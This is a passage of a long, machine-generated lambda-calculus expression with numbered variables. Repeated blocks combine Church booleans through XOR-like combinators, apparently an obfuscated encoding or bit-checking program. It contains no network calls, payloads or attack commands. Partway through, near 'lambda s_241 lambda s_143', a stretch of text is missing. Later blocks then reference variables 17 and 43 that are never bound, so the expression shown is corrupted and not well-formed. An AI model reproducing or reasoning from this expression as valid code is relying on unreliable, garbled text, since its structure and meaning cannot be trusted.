lambda s_135 ((lambda s_196 lambda s_199 ((196)(196))(199))(((lambda s_140 lambda s_97
((140)(97))(140))(135))((lambda s_4 lambda s_155 lambda s_158 ((4)(158))(155))(243))))
(((lambda s_24 lambda s_108 ((24)(108))(24))((lambda s_53 lambda s_229 lambda s_245
((53)(245))(229))(135)))(243)))(lambda s_1 lambda s_0 1))(lambda s_239 lambda s_142
142))))(((lambda s_140 lambda s_210 ((lambda s_207 lambda s_203 ((207)(207))(203))
(((lambda s_168 lambda s_145 ((168)(145))(168))(210))((lambda s_150 lambda s_129 lambda
s_188 ((150)(188))(129))(140))))(((lambda s_182 lambda s_94 ((182)(94))(182))((lambda
s_185 lambda s_221 lambda s_159 ((185)(159))(221))(210)))(140)))(lambda s_0 lambda s_1
0))(lambda s_49 lambda s_216 216))))(((lambda s_2 lambda s_104 ((lambda s_6 lambda s_78
((6)(6))(78))(((lambda s_93 lambda s_57 ((93)(57))(93))(104))((lambda s_38 lambda s_215
lambda s_217 ((38)(217))(215))(2))))(((lambda s_58 lambda s_158 ((58)(158))(58))
((lambda s_53 lambda s_221 lambda s_88 ((53)(88))(221))(104)))(2)))(lambda s_1 lambda
s_0 0))(lambda s_130 lambda s_10 130))))(((lambda s_240 lambda s_0 ((lambda s_109
lambda s_69 ((109)(109))(69))(((lambda s_246 lambda s_149 ((246)(149))(246))(0))
((lambda s_196 lambda s_33 lambda s_189 ((196)(189))(33))(240))))(((lambda s_191 lambda
s_242 ((191)(242))(191))((lambda s_217 lambda s_157 lambda s_98 ((217)(98))(157))(0)))
(240)))(lambda s_0 lambda s_1 0))(lambda s_96 lambda s_176 176))))(((lambda s_170
lambda s_109 ((lambda s_183 lambda s_136 ((183)(183))(136))(((lambda s_107 lambda s_7
((107)(7))(107))(109))((lambda s_205 lambda s_152 lambda s_130 ((205)(130))(152))
(170))))(((lambda s_32 lambda s_230 ((32)(230))(32))((lambda s_210 lambda s_33 lambda
s_52 ((210)(52))(33))(109)))(170)))(lambda s_1 lambda s_0 0))(lambda s_219 lambda s_123
219))))(((lambda s_158 lambda s_102 ((lambda s_249 lambda s_88 ((249)(249))(88))
(((lambda s_93 lambda s_55 ((93)(55))(93))(102))((lambda s_151 lambda s_184 lambda
s_225 ((151)(225))(184))(158))))(((lambda s_181 lambda s_124 ((181)(124))(181))((lambda
s_65 lambda s_134 lambda s_208 ((65)(208))(134))(102)))(158)))(lambda s_0 lambda s_1
0))(lambda s_37 lambda s_151 151))))(((lambda s_177 lambda s_133 ((lambda s_210 lambda
s_239 ((210)(210))(239))(((lambda s_202 lambda s_34 ((202)(34))(202))(133))((lambda
s_231 lambda s_193 lambda s_35 ((231)(35))(193))(177))))(((lambda s_187 lambda s_73
((187)(73))(187))((lambda s_168 lambda s_165 lambda s_102 ((168)(102))(165))(133)))
(177)))(lambda s_1 lambda s_0 1))(lambda s_73 lambda s_1 1))))(((lambda s_144 lambda
s_175 ((lambda s_105 lambda s_73 ((105)(105))(73))(((lambda s_15 lambda s_13 ((15)(13))
(15))(175))((lambda s_135 lambda s_80 lambda s_172 ((135)(172))(80))(144))))(((lambda
s_116 lambda s_189 ((116)(189))(116))((lambda s_167 lambda s_91 lambda s_109 ((167)
(109))(91))(175)))(144)))(lambda s_0 lambda s_1 1))(lambda s_8 lambda s_88 8))))
(((lambda s_99 lambda s_169 ((lambda s_250 lambda s_18 ((250)(250))(18))(((lambda s_172
lambda s_207 ((172)(207))(172))(169))((lambda s_50 lambda s_99 lambda s_27 ((50)(27))
(99))(99))))(((lambda s_60 lambda s_8 ((60)(8))(60))((lambda s_21 lambda s_27 lambda
s_153 ((21)(153))(27))(169)))(99)))(lambda s_1 lambda s_0 1))(lambda s_139 lambda s_28
28))))(((lambda s_98 lambda s_28 ((lambda s_154 lambda s_184 ((154)(154))(184))
(((lambda s_205 lambda s_93 ((205)(93))(205))(28))((lambda s_211 lambda s_11 lambda
s_213 ((211)(213))(11))(98))))(((lambda s_40 lambda s_164 ((40)(164))(40))((lambda s_0
lambda s_150 lambda s_199 ((0)(199))(150))(28)))(98)))(lambda s_0 lambda s_1 0))(lambda
s_190 lambda s_73 73))))(((lambda s_85 lambda s_103 ((lambda s_81 lambda s_141 ((81)
(81))(141))(((lambda s_97 lambda s_96 ((97)(96))(97))(103))((lambda s_94 lambda s_196
lambda s_152 ((94)(152))(196))(85))))(((lambda s_100 lambda s_119 ((100)(119))(100))
((lambda s_180 lambda s_164 lambda s_156 ((180)(156))(164))(103)))(85)))(lambda s_0
lambda s_1 0))(lambda s_92 lambda s_130 130))))(((lambda s_110 lambda s_99 ((lambda
s_87 lambda s_103 ((87)(87))(103))(((lambda s_200 lambda s_242 ((200)(242))(200))(99))
((lambda s_1 lambda s_220 lambda s_199 ((1)(199))(220))(110))))(((lambda s_173 lambda
s_220 ((173)(220))(173))((lambda s_54 lambda s_48 lambda s_135 ((54)(135))(48))(99)))
(110)))(lambda s_0 lambda s_1 0))(lambda s_9 lambda s_69 69))))(((lambda s_97 lambda
s_55 ((lambda s_50 lambda s_121 ((50)(50))(121))(((lambda s_169 lambda s_84 ((169)(84))
(169))(55))((lambda s_171 lambda s_9 lambda s_165 ((171)(165))(9))(97))))(((lambda
s_124 lambda s_183 ((124)(183))(124))((lambda s_111 lambda s_123 lambda s_144 ((111)
(144))(123))(55)))(97)))(lambda s_0 lambda s_1 1))(lambda s_169 lambda s_46 169))))
(((lambda s_21 lambda s_66 ((lambda s_140 lambda s_135 ((140)(140))(135))(((lambda
s_141 lambda s_41 ((141)(41))(141))(66))((lambda s_4 lambda s_116 lambda s_49 ((4)(49))
(116))(21))))(((lambda s_251 lambda s_16 ((251)(16))(251))((lambda s_255 lambda s_182
lambda s_41 ((255)(41))(182))(66)))(21)))(lambda s_0 lambda s_1 1))(lambda s_18 lambda
s_172 18))))(((lambda s_50 lambda s_121 ((lambda s_71 lambda s_184 ((71)(71))(184))
(((lambda s_1 lambda s_2 ((1)(2))(1))(121))((lambda s_148 lambda s_232 lambda s_46
((148)(46))(232))(50))))(((lambda s_137 lambda s_29 ((137)(29))(137))((lambda s_165
lambda s_11 lambda s_194 ((165)(194))(11))(121)))(50)))(lambda s_0 lambda s_1 0))
(lambda s_88 lambda s_15 15))))(((lambda s_84 lambda s_183 ((lambda s_203 lambda s_138
((203)(203))(138))(((lambda s_208 lambda s_93 ((208)(93))(208))(183))((lambda s_49
lambda s_129 lambda s_126 ((49)(126))(129))(84))))(((lambda s_25 lambda s_148 ((25)
(148))(25))((lambda s_26 lambda s_146 lambda s_99 ((26)(99))(146))(183)))(84)))(lambda
s_0 lambda s_1 0))(lambda s_3 lambda s_163 163))))(((lambda s_163 lambda s_186 ((lambda
s_91 lambda s_150 ((91)(91))(150))(((lambda s_144 lambda s_170 ((144)(170))(144))(186))
((lambda s_114 lambda s_36 lambda s_229 ((114)(229))(36))(163))))(((lambda s_38 lambda
s_175 ((38)(175))(38))((lambda s_110 lambda s_255 lambda s_52 ((110)(52))(255))(186)))
(163)))(lambda s_0 lambda s_1 1))(lambda s_168 lambda s_52 168))))(((lambda s_33 lambda
s_188 ((lambda s_77 lambda s_240 ((77)(77))(240))(((lambda s_74 lambda s_40 ((74)(40))
(74))(188))((lambda s_150 lambda s_29 lambda s_168 ((150)(168))(29))(33))))(((lambda
s_202 lambda s_178 ((202)(178))(202))((lambda s_142 lambda s_87 lambda s_118 ((142)
(118))(87))(188)))(33)))(lambda s_1 lambda s_0 0))(lambda s_220 lambda s_242 220))))
(((lambda s_89 lambda s_255 ((lambda s_0 lambda s_163 ((0)(0))(163))(((lambda s_155
lambda s_224 ((155)(224))(155))(255))((lambda s_243 lambda s_30 lambda s_248 ((243)
(248))(30))(89))))(((lambda s_239 lambda s_90 ((239)(90))(239))((lambda s_131 lambda
s_61 lambda s_174 ((131)(174))(61))(255)))(89)))(lambda s_1 lambda s_0 1))(lambda s_97
lambda s_74 74))))(((lambda s_62 lambda s_68 ((lambda s_254 lambda s_100 ((254)(254))
(100))(((lambda s_101 lambda s_184 ((101)(184))(101))(68))((lambda s_241 lambda s_143
(43))))(((lambda s_35 lambda s_81 ((35)(81))(35))((lambda s_54 lambda s_155 lambda
s_181 ((54)(181))(155))(17)))(43)))(lambda s_0 lambda s_1 1))(lambda s_177 lambda s_125
177))))(((lambda s_183 lambda s_87 ((lambda s_161 lambda s_127 ((161)(161))(127))
(((lambda s_59 lambda s_243 ((59)(243))(59))(87))((lambda s_64 lambda s_88 lambda s_170
((64)(170))(88))(183))))(((lambda s_140 lambda s_51 ((140)(51))(140))((lambda s_227
lambda s_168 lambda s_197 ((227)(197))(168))(87)))(183)))(lambda s_1 lambda s_0 0))
(lambda s_251 lambda s_208 251))))(((lambda s_156 lambda s_126 ((lambda s_81 lambda
s_15 ((81)(81))(15))(((lambda s_76 lambda s_128 ((76)(128))(76))(126))((lambda s_69
lambda s_102 lambda s_215 ((69)(215))(102))(156))))(((lambda s_58 lambda s_216 ((58)
(216))(58))((lambda s_41 lambda s_75 lambda s_163 ((41)(163))(75))(126)))(156)))(lambda
s_0 lambda s_1 0))(lambda s_198 lambda s_136 136))))(((lambda s_42 lambda s_51 ((lambda
s_7 lambda s_73 ((7)(7))(73))(((lambda s_54 lambda s_104 ((54)(104))(54))(51))((lambda
s_28 lambda s_230 lambda s_226 ((28)(226))(230))(42))))(((lambda s_184 lambda s_46
((184)(46))(184))((lambda s_165 lambda s_90 lambda s_117 ((165)(117))(90))(51)))(42)))
(lambda s_0 lambda s_1 1))(lambda s_198 lambda s_25 198))))(((lambda s_35 lambda s_98
((lambda s_242 lambda s_196 ((242)(242))(196))(((lambda s_114 lambda s_55 ((114)(55))
(114))(98))((lambda s_242 lambda s_2 lambda s_55 ((242)(55))(2))(35))))(((lambda s_12
lambda s_166 ((12)(166))(12))((lambda s_210 lambda s_74 lambda s_25 ((210)(25))(74))
(98)))(35)))(lambda s_0 lambda s_1 1))(lambda s_244 lambda s_10 244))))(((lambda s_127
lambda s_225 ((lambda s_163 lambda s_111 ((163)(163))(111))(((lambda s_83 lambda s_224
((83)(224))(83))(225))((lambda s_55 lambda s_214 lambda s_246 ((55)(246))(214))(127))))
(((lambda s_252 lambda s_103 ((252)(103))(252))((lambda s_65 lambda s_69 lambda s_240
((65)(240))(69))(225)))(127)))(lambda s_0 lambda s_1 1))(lambda s_112 lambda s_186
112))))(((lambda s_187 lambda s_242 ((lambda s_6 lambda s_182 ((6)(6))(182))(((lambda
s_84 lambda s_179 ((84)(179))(84))(242))((lambda s_174 lambda s_103 lambda s_162 ((174)
(162))(103))(187))))(((lambda s_15 lambda s_82 ((15)(82))(15))((lambda s_188 lambda
s_59 lambda s_219 ((188)(219))(59))(242)))(187)))(lambda s_1 lambda s_0 1))(lambda
s_101 lambda s_248 248))))(((lambda s_117 lambda s_13 ((lambda s_39 lambda s_191 ((39)
(39))(191))(((lambda s_223 lambda s_203 ((223)(203))(223))(13))((lambda s_235 lambda
s_236 lambda s_121 ((235)(121))(236))(117))))(((lambda s_39 lambda s_99 ((39)(99))(39))
((lambda s_149 lambda s_242 lambda s_109 ((149)(109))(242))(13)))(117)))(lambda s_1
lambda s_0 0))(lambda s_83 lambda s_91 83))))(((lambda s_94 lambda s_53 ((lambda s_11
lambda s_121 ((11)(11))(121))(((lambda s_208 lambda s_103 ((208)(103))(208))(53))
((lambda s_190 lambda s_234 lambda s_51 ((190)(51))(234))(94))))(((lambda s_137 lambda
s_146 ((137)(146))(137))((lambda s_9 lambda s_41 lambda s_68 ((9)(68))(41))(53)))(94)))
(lambda s_0 lambda s_1 0))(lambda s_227 lambda s_98 98))))(((lambda s_207 lambda s_251
((lambda s_137 lambda s_118 ((137)(137))(118))(((lambda s_74 lambda s_37 ((74)(37))
(74))(251))((lambda s_151 lambda s_237 lambda s_222 ((151)(222))(237))(207))))(((lambda
s_213 lambda s_152 ((213)(152))(213))((lambda s_225 lambda s_124 lambda s_202 ((225)
(202))(124))(251)))(207)))(lambda s_1 lambda s_0 1))(lambda s_105 lambda s_79 79))))
(((lambda s_186 lambda s_165 ((lambda s_75 lambda s_54 ((75)(75))(54))(((lambda s_0
lambda s_110 ((0)(110))(0))(165))((lambda s_72 lambda s_239 lambda s_11 ((72)(11))
(239))(186))))(((lambda s_132 lambda s_10 ((132)(10))(132))((lambda s_20 lambda s_161
lambda s_43 ((20)(43))(161))(165)))(186)))(lambda s_0 lambda s_1 0))(lambda s_81 lambda
s_194 194))))(((lambda s_207 lambda s_64 ((lambda s_55 lambda s_36 ((55)(55))(36))
(((lambda s_114 lambda s_151 ((114)(151))(114))(64))((lambda s_219 lambda s_104 lambda
s_231 ((219)(231))(104))(207))))(((lambda s_87 lambda s_21 ((87)(21))(87))((lambda s_71
lambda s_158 lambda s_102 ((71)(102))(158))(64)))(207)))(lambda s_1 lambda s_0 0))
(lambda s_243 lambda s_162 243))))(((lambda s_28 lambda s_177 ((lambda s_213 lambda
s_109 ((213)(213))(109))(((lambda s_183 lambda s_174 ((183)(174))(183))(177))((lambda
s_44 lambda s_241 lambda s_180 ((44)(180))(241))(28))))(((lambda s_123 lambda s_190
((123)(190))(123))((lambda s_193 lambda s_128 lambda s_42 ((193)(42))(128))(177)))
(28)))(lambda s_1 lambda s_0 0))(lambda s_80 lambda s_36 80))))(((lambda s_251 lambda
s_168 ((lambda s_207 lambda s_98 ((207)(207))(98))(((lambda s_97 lambda s_156 ((97)
(156))(97))(168))((lambda s_255 lambda s_186 lambda s_3 ((255)(3))(186))(251))))
(((lambda s_0 lambda s_254 ((0)(254))(0))((lambda s_213 lambda s_88 lambda s_179 ((213)
(179))(88))(168)))(251)))(lambda s_1 lambda s_0 0))(lambda s_132 lambda s_46 132))))
(((lambda s_124 lambda s_239 ((lambda s_210 lambda s_187 ((210)(210))(187))(((lambda
s_145 lambda s_8 ((145)(8))(145))(239))((lambda s_15 lambda s_122 lambda s_191 ((15)
(191))(122))(124))))(((lambda s_237 lambda s_127 ((237)(127))(237))((lambda s_6 lambda
s_192 lambda s_246 ((6)(246))(192))(239)))(124)))(lambda s_0 lambda s_1 0))(lambda s_46
lambda s_19 19))))(((lambda s_189 lambda s_193 ((lambda s_62 lambda s_248 ((62)(62))
(248))(((lambda s_66 lambda s_245 ((66)(245))(66))(193))((lambda s_4 lambda s_168
lambda s_15 ((4)(15))(168))(189))))(((lambda s_252 lambda s_161 ((252)(161))(252))
((lambda s_54 lambda s_239 lambda s_119 ((54)(119))(239))(193)))(189)))(lambda s_1
lambda s_0 1))(lambda s_26 lambda s_197 197))))(((lambda s_124 lambda s_53 ((lambda
s_49 lambda s_162 ((49)(49))(162))(((lambda s_34 lambda s_106 ((34)(106))(34))(53))
((lambda s_138 lambda s_47 lambda s_112 ((138)(112))(47))(124))))(((lambda s_227 lambda
s_234 ((227)(234))(227))((lambda s_93 lambda s_32 lambda s_142 ((93)(142))(32))(53)))
(124)))(lambda s_0 lambda s_1 1))(lambda s_86 lambda s_159 86))))(((lambda s_72 lambda
s_156 ((lambda s_166 lambda s_16 ((166)(166))(16))(((lambda s_70 lambda s_187 ((70)
(187))(70))(156))((lambda s_111 lambda s_234 lambda s_251 ((111)(251))(234))(72))))
(((lambda s_78 lambda s_93 ((78)(93))(78))((lambda s_30 lambda s_203 lambda s_71 ((30)
(71))(203))(156)))(72)))(lambda s_0 lambda s_1 0))(lambda s_171 lambda s_157 157))))
(((lambda s_115 lambda s_205 ((lambda s_16 lambda s_130 ((16)(16))(130))(((lambda s_168
lambda s_59 ((168)(59))(168))(205))((lambda s_13 lambda s_119 lambda s_5 ((13)(5))
(119))(115))))(((lambda s_253 lambda s_110 ((253)(110))(253))((lambda s_139 lambda s_7
lambda s_206 ((139)(206))(7))(205)))(115)))(lambda s_1 lambda s_0 0))(lambda s_73
lambda s_24 73))))(((lambda s_180 lambda s_39 ((lambda s_5 lambda s_80 ((5)(5))(80))
(((lambda s_231 lambda s_150 ((231)(150))(231))(39))((lambda s_248 lambda s_251 lambda
s_253 ((248)(253))(251))(180))))(((lambda s_24 lambda s_135 ((24)(135))(24))((lambda
s_225 lambda s_223 lambda s_64 ((225)(64))(223))(39)))(180)))(lambda s_1 lambda s_0 1))
(lambda s_146 lambda s_239 239))))(((lambda s_88 lambda s_0 ((lambda s_244 lambda s_17
((244)(244))(17))(((lambda s_74 lambda s_180 ((74)(180))(74))(0))((lambda s_240 lambda
s_23 lambda s_71 ((240)(71))(23))(88))))(((lambda s_98 lambda s_40 ((98)(40))(98))
((lambda s_114 lambda s_72 lambda s_165 ((114)(165))(72))(0)))(88)))(lambda s_1 lambda
s_0 1))(lambda s_61 lambda s_113 113))))(((lambda s_239 lambda s_236 ((lambda s_108
lambda s_202 ((108)(108))(202))(((lambda s_37 lambda s_119 ((37)(119))(37))(236))
((lambda s_238 lambda s_172 lambda s_75 ((238)(75))(172))(239))))(((lambda s_54 lambda
s_26 ((54)(26))(54))((lambda s_168 lambda s_44 lambda s_151 ((168)(151))(44))(236)))
(239)))(lambda s_1 lambda s_0 1))(lambda s_153 lambda s_34 34))))(((lambda s_57 lambda
s_187 ((lambda s_75 lambda s_250 ((75)(75))(250))(((lambda s_150 lambda s_74 ((150)
(74))(150))(187))((lambda s_18 lambda s_90 lambda s_85 ((18)(85))(90))(57))))(((lambda
s_22 lambda s_68 ((22)(68))(22))((lambda s_151 lambda s_71 lambda s_166 ((151)(166))
(71))(187)))(57)))(lambda s_0 lambda s_1 1))(lambda s_230 lambda s_234 230))))(((lambda
s_253 lambda s_125 ((lambda s_115 lambda s_157 ((115)(115))(157))(((lambda s_229 lambda
s_214 ((229)(214))(229))(125))((lambda s_74 lambda s_63 lambda s_113 ((74)(113))(63))
(253))))(((lambda s_81 lambda s_46 ((81)(46))(81))((lambda s_156 lambda s_226 lambda
s_6 ((156)(6))(226))(125)))(253)))(lambda s_1 lambda s_0 0))(lambda s_79 lambda s_150
79))))(((lambda s_9 lambda s_79 ((lambda s_252 lambda s_18 ((252)(252))(18))(((lambda
s_62 lambda s_229 ((62)(229))(62))(79))((lambda s_195 lambda s_48 lambda s_68 ((195)
(68))(48))(9))))(((lambda s_33 lambda s_19 ((33)(19))(33))((lambda s_164 lambda s_241
lambda s_109 ((164)(109))(241))(79)))(9)))(lambda s_1 lambda s_0 1))(lambda s_253
lambda s_5 5))))(((lambda s_175 lambda s_216 ((lambda s_140 lambda s_89 ((140)(140))
(89))(((lambda s_208 lambda s_237 ((208)(237))(208))(216))((lambda s_94 lambda s_192
lambda s_73 ((94)(73))(192))(175))))(((lambda s_8 lambda s_164 ((8)(164))(8))((lambda
s_219 lambda s_0 lambda s_131 ((219)(131))(0))(216)))(175)))(lambda s_1 lambda s_0 1))
(lambda s_26 lambda s_91 91))))(((lambda s_15 lambda s_186 ((lambda s_191 lambda s_147
((191)(191))(147))(((lambda s_32 lambda s_218 ((32)(218))(32))(186))((lambda s_45
lambda s_160 lambda s_144 ((45)(144))(160))(15))))(((lambda s_106 lambda s_5 ((106)(5))
(106))((lambda s_29 lambda s_79 lambda s_221 ((29)(221))(79))(186)))(15)))(lambda s_1
lambda s_0 0))(lambda s_192 lambda s_72 192))))(((lambda s_80 lambda s_138 ((lambda
s_220 lambda s_101 ((220)(220))(101))(((lambda s_89 lambda s_218 ((89)(218))(89))(138))
((lambda s_137 lambda s_45 lambda s_57 ((137)(57))(45))(80))))(((lambda s_56 lambda
s_216 ((56)(216))(56))((lambda s_108 lambda s_57 lambda s_223 ((108)(223))(57))(138)))
(80)))(lambda s_0 lambda s_1 0))(lambda s_247 lambda s_115 115))))(((lambda s_92 lambda
s_87 ((lambda s_55 lambda s_155 ((55)(55))(155))(((lambda s_125 lambda s_199 ((125)
(199))(125))(87))((lambda s_94 lambda s_60 lambda s_1 ((94)(1))(60))(92))))(((lambda
s_151 lambda s_125 ((151)(125))(151))((lambda s_82 lambda s_244 lambda s_4 ((82)(4))
(244))(87)))(92)))(lambda s_0 lambda s_1 0))(lambda s_155 lambda s_249 249))))(((lambda
s_80 lambda s_182 ((lambda s_215 lambda s_126 ((215)(215))(126))(((lambda s_240 lambda
s_141 ((240)(141))(240))(182))((lambda s_141 lambda s_100 lambda s_138 ((141)(138))
(100))(80))))(((lambda s_33 lambda s_215 ((33)(215))(33))((lambda s_245 lambda s_224
lambda s_86 ((245)(86))(224))(182)))(80)))(lambda s_0 lambda s_1 0))(lambda s_178
lambda s_37 37))))(((lambda s_219 lambda s_27 ((lambda s_151 lambda s_180 ((151)(151))
(180))(((lambda s_60 lambda s_148 ((60)(148))(60))(27))((lambda s_79 lambda s_129
lambda s_61 ((79)(61))(129))(219))))(((lambda s_204 lambda s_182 ((204)(182))(204))
((lambda s_115 lambda s_58 lambda s_14 ((115)(14))(58))(27)))(219)))(lambda s_1 lambda
s_0 0))(lambda s_125 lambda s_168 125))))(((lambda s_162 lambda s_160 ((lambda s_74
lambda s_100 ((74)(74))(100))(((lambda s_34 lambda s_248 ((34)(248))(34))(160))((lambda
s_235 lambda s_198 lambda s_50 ((235)(50))(198))(162))))(((lambda s_113 lambda s_171
((113)(171))(113))((lambda s_225 lambda s_124 lambda s_30 ((225)(30))(124))(160)))
(162)))(lambda s_0 lambda s_1 1))(lambda s_178 lambda s_249 178))))(((lambda s_116
lambda s_221 ((lambda s_101 lambda s_225 ((101)(101))(225))(((lambda s_50 lambda s_52
((50)(52))(50))(221))((lambda s_72 lambda s_202 lambda s_172 ((72)(172))(202))(116))))
(((lambda s_110 lambda s_82 ((110)(82))(110))((lambda s_160 lambda s_237 lambda s_42
((160)(42))(237))(221)))(116)))(lambda s_1 lambda s_0 1))(lambda s_135 lambda s_112
112))))(((lambda s_89 lambda s_215 ((lambda s_184 lambda s_253 ((184)(184))(253))
(((lambda s_91 lambda s_227 ((91)(227))(91))(215))((lambda s_108 lambda s_16 lambda
s_31 ((108)(31))(16))(89))))(((lambda s_2 lambda s_57 ((2)(57))(2))((lambda s_226
lambda s_52 lambda s_114 ((226)(114))(52))(215)))(89)))(lambda s_0 lambda s_1 0))
(lambda s_98 lambda s_59 59))))(((lambda s_53 lambda s_95 ((lambda s_123 lambda s_121
((123)(123))(121))(((lambda s_207 lambda s_175 ((207)(175))(207))(95))((lambda s_45
lambda s_55 lambda s_130 ((45)(130))(55))(53))))(((lambda s_169 lambda s_191 ((169)
(191))(169))((lambda s_59 lambda s_58 lambda s_74 ((59)(74))(58))(95)))(53)))(lambda
s_1 lambda s_0 0))(lambda s_34 lambda s_28 34))))(((lambda s_161 lambda s_239 ((lambda
s_4 lambda s_146 ((4)(4))(146))(((lambda s_8 lambda s_7 ((8)(7))(8))(239))((lambda
s_110 lambda s_113 lambda s_10 ((110)(10))(113))(161))))(((lambda s_1 lambda s_30 ((1)
(30))(1))((lambda s_72 lambda s_246 lambda s_23 ((72)(23))(246))(239)))(161)))(lambda
s_1 lambda s_0 0))(lambda s_210 lambda s_245 210))))(((lambda s_40 lambda s_77 ((lambda
s_57 lambda s_242 ((57)(57))(242))(((lambda s_108 lambda s_211 ((108)(211))(108))(77))
((lambda s_216 lambda s_236 lambda s_219 ((216)(219))(236))(40))))(((lambda s_164
lambda s_49 ((164)(49))(164))((lambda s_211 lambda s_24 lambda s_101 ((211)(101))(24))
(77)))(40)))(lambda s_1 lambda s_0 0))(lambda s_102 lambda s_21 102))))(((lambda s_129
lambda s_228 ((lambda s_193 lambda s_124 ((193)(193))(124))(((lambda s_32 lambda s_232
((32)(232))(32))(228))((lambda s_227 lambda s_43 lambda s_201 ((227)(201))(43))(129))))
(((lambda s_180 lambda s_83 ((180)(83))(180))((lambda s_122 lambda s_68 lambda s_87
((122)(87))(68))(228)))(129)))(lambda s_1 lambda s_0 0))(lambda s_235 lambda s_105
235))))(((lambda s_4 lambda s_149 ((lambda s_163 lambda s_179 ((163)(163))(179))
(((lambda s_16 lambda s_147 ((16)(147))(16))(149))((lambda s_23 lambda s_85 lambda
s_125 ((23)(125))(85))(4))))(((lambda s_185 lambda s_237 ((185)(237))(185))((lambda
s_255 lambda s_137 lambda s_205 ((255)(205))(137))(149)))(4)))(lambda s_1 lambda s_0
0))(lambda s_88 lambda s_251 88))))(((lambda s_92 lambda s_69 ((lambda s_72 lambda s_97
((72)(72))(97))(((lambda s_76 lambda s_189 ((76)(189))(76))(69))((lambda s_103 lambda
s_152 lambda s_202 ((103)(202))(152))(92))))(((lambda s_19 lambda s_230 ((19)(230))
(19))((lambda s_247 lambda s_21 lambda s_49 ((247)(49))(21))(69)))(92)))(lambda s_1
lambda s_0 1))(lambda s_24 lambda s_253 253))))(((lambda s_43 lambda s_114 ((lambda
s_56 lambda s_207 ((56)(56))(207))(((lambda s_40 lambda s_239 ((40)(239))(40))(114))
((lambda s_27 lambda s_196 lambda s_207 ((27)(207))(196))(43))))(((lambda s_138 lambda
s_121 ((138)(121))(138))((lambda s_100 lambda s_124 lambda s_145 ((100)(145))(124))
(114)))(43)))(lambda s_0 lambda s_1 1))(lambda s_182 lambda s_150 182))))(((lambda
s_106 lambda s_140 ((lambda s_229 lambda s_242 ((229)(229))(242))(((lambda s_159 lambda
s_2 ((159)(2))(159))(140))((lambda s_237 lambda s_3 lambda s_77 ((237)(77))(3))(106))))
(((lambda s_124 lambda s_62 ((124)(62))(124))((lambda s_71 lambda s_118 lambda s_74
((71)(74))(118))(140)))(106)))(lambda s_1 lambda s_0 0))(lambda s_137 lambda s_250
137))))(((lambda s_198 lambda s_155 ((lambda s_175 lambda s_202 ((175)(175))(202))
(((lambda s_74 lambda s_182 ((74)(182))(74))(155))((lambda s_98 lambda s_198 lambda
s_241 ((98)(241))(198))(198))))(((lambda s_116 lambda s_52 ((116)(52))(116))((lambda
s_135 lambda s_200 lambda s_142 ((135)(142))(200))(155)))(198)))(lambda s_0 lambda s_1
0))(lambda s_121 lambda s_188 188))))(((lambda s_47 lambda s_115 ((lambda s_138 lambda
s_71 ((138)(138))(71))(((lambda s_242 lambda s_59 ((242)(59))(242))(115))((lambda s_122
lambda s_117 lambda s_196 ((122)(196))(117))(47))))(((lambda s_216 lambda s_184 ((216)
(184))(216))((lambda s_252 lambda s_34 lambda s_17 ((252)(17))(34))(115)))(47)))(lambda
s_1 lambda s_0 1))(lambda s_247 lambda s_67 67))))(((lambda s_209 lambda s_182 ((lambda
s_140 lambda s_68 ((140)(140))(68))(((lambda s_153 lambda s_22 ((153)(22))(153))(182))
((lambda s_73 lambda s_101 lambda s_45 ((73)(45))(101))(209))))(((lambda s_164 lambda
s_9 ((164)(9))(164))((lambda s_1 lambda s_221 lambda s_216 ((1)(216))(221))(182)))
(209)))(lambda s_1 lambda s_0 1))(lambda s_73 lambda s_10 10))))(((lambda s_86 lambda
s_225 ((lambda s_124 lambda s_229 ((124)(124))(229))(((lambda s_68 lambda s_118 ((68)
(118))(68))(225))((lambda s_209 lambda s_153 lambda s_196 ((209)(196))(153))(86))))
(((lambda s_193 lambda s_110 ((193)(110))(193))((lambda s_125 lambda s_59 lambda s_227
((125)(227))(59))(225)))(86)))(lambda s_1 lambda s_0 1))(lambda s_47 lambda s_244
244))))(((lambda s_64 lambda s_134 ((lambda s_248 lambda s_49 ((248)(248))(49))
(((lambda s_105 lambda s_62 ((105)(62))(105))(134))((lambda s_69 lambda s_226 lambda
s_17 ((69)(17))(226))(64))))(((lambda s_92 lambda s_232 ((92)(232))(92))((lambda s_99
lambda s_234 lambda s_67 ((99)(67))(234))(134)))(64)))(lambda s_0 lambda s_1 1))(lambda
s_157 lambda s_8 157))))(((lambda s_232 lambda s_246 ((lambda s_239 lambda s_170 ((239)
(239))(170))(((lambda s_93 lambda s_252 ((93)(252))(93))(246))((lambda s_53 lambda s_30
lambda s_170 ((53)(170))(30))(232))))(((lambda s_62 lambda s_205 ((62)(205))(62))
((lambda s_164 lambda s_109 lambda s_125 ((164)(125))(109))(246)))(232)))(lambda s_0
lambda s_1 0))(lambda s_57 lambda s_177 177))))(((lambda s_234 lambda s_40 ((lambda
s_104 lambda s_141 ((104)(104))(141))(((lambda s_108 lambda s_109 ((108)(109))(108))
(40))((lambda s_78 lambda s_224 lambda s_50 ((78)(50))(224))(234))))(((lambda s_205
lambda s_81 ((205)(81))(205))((lambda s_50 lambda s_55 lambda s_172 ((50)(172))(55))
(40)))(234)))(lambda s_0 lambda s_1 1))(lambda s_120 lambda s_10 120))))(((lambda s_162
lambda s_155 ((lambda s_163 lambda s_34 ((163)(163))(34))(((lambda s_31 lambda s_44
((31)(44))(31))(155))((lambda s_171 lambda s_83 lambda s_255 ((171)(255))(83))(162))))
(((lambda s_186 lambda s_60 ((186)(60))(186))((lambda s_7 lambda s_158 lambda s_245
((7)(245))(158))(155)))(162)))(lambda s_1 lambda s_0 1))(lambda s_229 lambda s_148
148))))(((lambda s_59 lambda s_68 ((lambda s_74 lambda s_65 ((74)(74))(65))(((lambda
s_63 lambda s_79 ((63)(79))(63))(68))((lambda s_103 lambda s_21 lambda s_192 ((103)
(192))(21))(59))))(((lambda s_190 lambda s_94 ((190)(94))(190))((lambda s_247 lambda
s_26 lambda s_120 ((247)(120))(26))(68)))(59)))(lambda s_1 lambda s_0 0))(lambda s_176
lambda s_75 176))))(((lambda s_145 lambda s_241 ((lambda s_190 lambda s_116 ((190)
(190))(116))(((lambda s_101 lambda s_190 ((101)(190))(101))(241))((lambda s_46 lambda
s_99 lambda s_143 ((46)(143))(99))(145))))(((lambda s_60 lambda s_6 ((60)(6))(60))
((lambda s_124 lambda s_226 lambda s_148 ((124)(148))(226))(241)))(145)))(lambda s_0
lambda s_1 1))(lambda s_125 lambda s_39 125))))(((lambda s_218 lambda s_143 ((lambda
s_59 lambda s_224 ((59)(59))(224))(((lambda s_120 lambda s_118 ((120)(118))(120))(143))
